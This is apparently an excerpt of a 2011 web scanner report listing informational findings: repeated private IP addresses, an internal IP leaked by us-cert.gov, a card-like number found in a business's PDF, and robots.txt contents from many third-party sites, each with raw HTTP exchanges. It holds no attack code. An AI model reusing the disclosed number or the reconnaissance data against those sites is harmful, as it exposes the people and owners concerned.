<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.38</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.34</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...
<td>172.16.248.42</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.35</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.36</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.41</td>
...[SNIP]...
<td>172.16.248.37</td>
...[SNIP]...
<td>172.16.248.44</td>
...[SNIP]...
<td>172.16.248.43</td>
...[SNIP]...
<td>172.16.248.40</td>
...[SNIP]...
<td>172.16.248.45</td>
...[SNIP]...
<td>172.16.248.39</td>
...[SNIP]...

20.24. http://www.us-cert.gov/cas/tips/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.us-cert.gov
Path:	/cas/tips/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.61.2.84

Request

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:40:08 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 13035

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Cyber Security Tips
...[SNIP]...
r=0&access=p&ud=1&sort=date%3AD%3AL%3Ad1&output=xml_no_dtd&site=default_collection&ie=UTF-8&oe=UTF-8&client=default_frontend&proxystylesheet=default_frontend&ip=10.61.2.84&proxycustom=<ADVANCED/>" title="customize">
...[SNIP]...

21. Credit card numbers disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.partainandson.com
Path:	/White_Horse_Beach.pdf

Issue detail

The following credit card number was disclosed in the response:

5005394442781333

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /White_Horse_Beach.pdf HTTP/1.1
Host: www.partainandson.com
Proxy-Connection: keep-alive
Referer: http://partainandson.com/our_work.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252223368.1847577199.1310516655.1310516655.1310516655.1; __utmb=252223368.2.10.1310516655; __utmc=252223368; __utmz=252223368.1310516655.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 00:24:36 GMT
Server: Apache/2.2.19
Last-Modified: Fri, 01 Jul 2011 14:33:10 GMT
ETag: "31690-4a702e58f7580"
Accept-Ranges: bytes
Content-Length: 202384
Content-Type: application/pdf

%PDF-1.5%....
115 0 obj<</Linearized 1/L 69505/O 117/E 6253/N 12/T 69147/H [ 436 220]>>endobj 121 0 obj<</Length 50/Root 116 0 R/ID[<AF2ADDA304D50FF5CAF4DE514619E200><73449A5CC9
...[SNIP]...
22 781 500 611 444]1723 1724 539 1725 1726 444 1727 1728 500 1729[443 422 500 200 281 249 333 1333 1166 944]1740[889 556 1111]1744[778 444 722 444 0 722 444 889 667 722 500 722 500 722 500 722 500 722 500 539 444 278 1333 1166 944 722 500 950 560 722 500 722 444 722 444 611 444 611 444 333 278 333 278 722 500 722 500 667 333 667 333 722 500 722 500 556 389 611 278 563 395 722 500 650 604 500 611 444 722 444 611 444 722
...[SNIP]...

22. Robots.txt file previous next
There are 32 instances of this issue:

http://1.gravatar.com/blavatar/183104b8582a0b2533f9416c5f5d53fe
https://admin.ccbill.com/
http://apps.ccbill.com/favicon.ico
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://blog.katango.com/
http://blogs.adobe.com/psirt/
http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm
http://itunes.apple.com/WebObjects/MZStore.woa/wa/ajaxCache
http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur
http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316
http://mtrcs.popcap.com/b/ss/popcapcom/1/H.21/s25055282826069
http://pixel.mathtag.com/data/img
http://s.gravatar.com/js/gprofiles.js
http://s0.wp.com/wp-content/themes/h4/global.css
http://s1.wp.com/wp-includes/js/l10n.js
http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.css
http://stats.adobe.com/b/ss/mxmacromedia/1/H.23.3/s22758062051143
http://tag.admeld.com/pixel
http://trustedcs.com/
http://www.apple.com/itunes
http://www.burstnet.com/enlightn/8171/99D2/
http://www.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536
http://www.imiclk.com/cgi/r.cgi
http://www.interactivemediaawards.com/winners/certificate.asp
http://www.lowes.com/
https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm
http://www.ox.popcap.com/delivery/afr.php
http://www.popcap.com/favicon.ico
http://www.youtube.com/embed/IHmPw1HsCe4
http://www7.lowes.com/eluminate

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

22.1. http://1.gravatar.com/blavatar/183104b8582a0b2533f9416c5f5d53fe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://1.gravatar.com
Path:	/blavatar/183104b8582a0b2533f9416c5f5d53fe

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: text/plain
Date: Tue, 12 Jul 2011 20:47:03 GMT
Expires: Tue, 12 Jul 2011 20:52:03 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

22.2. https://admin.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: admin.ccbill.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:54 GMT
Last-Modified: Thu, 15 May 2003 21:07:39 GMT
ETag: "411141-25-3bdba517f5cc0"
Accept-Ranges: bytes
Content-Length: 37
Keep-Alive: timeout=5, max=88
Connection: close
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

# Bug Off
User-agent: *
Disallow: /

22.3. http://apps.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apps.ccbill.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apps.ccbill.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:01:58 GMT
Server: Apache
Last-Modified: Wed, 27 Jan 2010 20:52:55 GMT
ETag: "90d77-ad-962bf7c0"
Accept-Ranges: bytes
Content-Length: 173
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: admin/
Disallow: includes/
Disallow: templates/
Disallow: updates/
Disallow: logout.php
Disallow: suggest-listing.php
Disallow: suggest-category.php

22.4. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 19 Mar 2009 21:31:08 GMT
ETag: "b044005-1a-4657f84ac9f00"
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=172800
Expires: Thu, 14 Jul 2011 20:39:31 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

22.5. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Wed, 13 Jul 2011 20:46:59 GMT
Date: Tue, 12 Jul 2011 20:46:59 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

22.6. http://blog.katango.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.katango.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blog.katango.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:46:56 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-Pingback: http://blog.katango.com/xmlrpc.php
X-nc: HIT ord 2

User-agent: *
Disallow:

22.7. http://blogs.adobe.com/psirt/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.adobe.com
Path:	/psirt/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:19 GMT
Server: Apache
Last-Modified: Tue, 25 Jan 2011 10:43:19 GMT
ETag: "35a0004-22-49aa962779fc0"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Disallow:

22.8. http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gw-services.vtrenz.net
Path:	/WebCookies/RegisterWebPageVisit.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gw-services.vtrenz.net

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Content-Location: http://gw-services.vtrenz.net/robots.txt
Last-Modified: Thu, 17 Dec 2009 23:02:00 GMT
Accept-Ranges: bytes
ETag: "24327ef06c7fca1:220a"
Server: Microsoft-IIS/6.0
Date: Tue, 12 Jul 2011 18:09:11 GMT
Connection: close

User-agent: *
Disallow: /

22.9. http://itunes.apple.com/WebObjects/MZStore.woa/wa/ajaxCache previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/WebObjects/MZStore.woa/wa/ajaxCache

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: itunes.apple.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Jul 2011 14:49:50 GMT
ETag: "d1-4a77bd4401f27"
Accept-Ranges: bytes
Content-Length: 209
Content-Type: text/plain
Cache-Control: public, no-transform, max-age=62
Date: Tue, 12 Jul 2011 20:46:21 GMT
Connection: close
X-Apple-Partner: origin.0

User-agent: *
Disallow: /WebObjects/MZFastFinance.woa
Disallow: /WebObjects/MZFinance.woa
Disallow: /WebObjects/MZPersonalizer.woa
Disallow: /WebObjects/MZSidebar.woa
Disallow: /WebObjects/MZStoreElem
...[SNIP]...

22.10. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.googleapis.com
Path:	/maps/api/js/AuthenticationService.Authenticate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Tue, 12 Jul 2011 15:33:07 GMT
Expires: Tue, 12 Jul 2011 15:33:07 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 26
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /

22.11. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.gstatic.com
Path:	/intl/en_us/mapfiles/closedhand_8_8.cur

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.gstatic.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 23 Aug 2010 20:46:35 GMT
Date: Wed, 13 Jul 2011 00:37:24 GMT
Expires: Wed, 13 Jul 2011 00:37:24 GMT
Cache-Control: private, max-age=31536000
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.12. http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.apple.com
Path:	/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:59:13 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "235149-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www148
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.13. http://mtrcs.popcap.com/b/ss/popcapcom/1/H.21/s25055282826069 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mtrcs.popcap.com
Path:	/b/ss/popcapcom/1/H.21/s25055282826069

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mtrcs.popcap.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:19 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "36515b-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www33
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.14. http://pixel.mathtag.com/data/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/data/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x5 pid 0x221a 8730
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *

22.15. http://s.gravatar.com/js/gprofiles.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.gravatar.com
Path:	/js/gprofiles.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Tue, 12 Jul 2011 20:47:00 GMT
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Server: ECS (dca/5339)
X-Cache: HIT
Content-Length: 99
Connection: close

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

22.16. http://s0.wp.com/wp-content/themes/h4/global.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s0.wp.com
Path:	/wp-content/themes/h4/global.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.wp.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Date: Tue, 12 Jul 2011 20:46:57 GMT
Last-Modified: Thu, 07 Jul 2011 17:56:35 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-nc: HIT luv 45
X-Pingback: http://s-origin.wordpress.com/xmlrpc.php
Content-Length: 503
Connection: close

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...

22.17. http://s1.wp.com/wp-includes/js/l10n.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s1.wp.com
Path:	/wp-includes/js/l10n.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s1.wp.com

Response

22.18. http://s2.wp.com/wp-content/mu-plugins/post-react-1/sharing/sharing.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s2.wp.com
Path:	/wp-content/mu-plugins/post-react-1/sharing/sharing.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s2.wp.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Date: Tue, 12 Jul 2011 20:47:10 GMT
Last-Modified: Thu, 07 Jul 2011 17:56:35 GMT
Server: ECS (dca/5339)
Vary: Accept-Encoding
X-Cache: HIT
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
X-nc: HIT luv 45
X-Pingback: http://s-origin.wordpress.com/xmlrpc.php
Content-Length: 503
Connection: close

# If you are regularly crawling WordPress.com sites please use our firehose to receive real-time push updates instead.
# Please see http://en.wordpress.com/firehose/ for more details.

Sitemap: http:/
...[SNIP]...

